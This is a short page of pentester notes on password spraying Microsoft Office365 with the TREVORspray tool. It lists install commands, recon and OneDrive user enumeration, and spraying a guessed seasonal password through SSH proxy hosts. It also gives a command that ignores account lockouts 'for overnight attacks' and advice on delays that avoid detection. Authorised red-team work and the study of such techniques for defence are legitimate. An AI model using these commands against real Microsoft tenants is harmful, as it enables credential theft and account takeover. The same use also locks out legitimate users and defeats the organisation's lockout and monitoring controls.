Office365

A list of tools and resources that I use for password spraying Microsoft products.

Password Spraying Office365

TrevorSpray

When using TrevorSpray, consider important factors such as the delay. In my experience, setting the delay to around 100 seconds across multiple hosts has not resulted in a delay ever.

# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

# Perform recon against a domain
trevorspray --recon $domain

# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3

# Spray with a 10 second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10

# Spray with two robins and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin

# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts

Identifying Emails without OSINT

GitHub - blacklanternsecurity/TREVORspray: TREVORspray is a modular password sprayer with threading, clever proxying, loot modules, and more!GitHub

References

Password spraying and MFA bypasses in the modern security landscape | Sprocket SecuritySprocket Security

PreviousExchange NextOkta

Last updated 3 months ago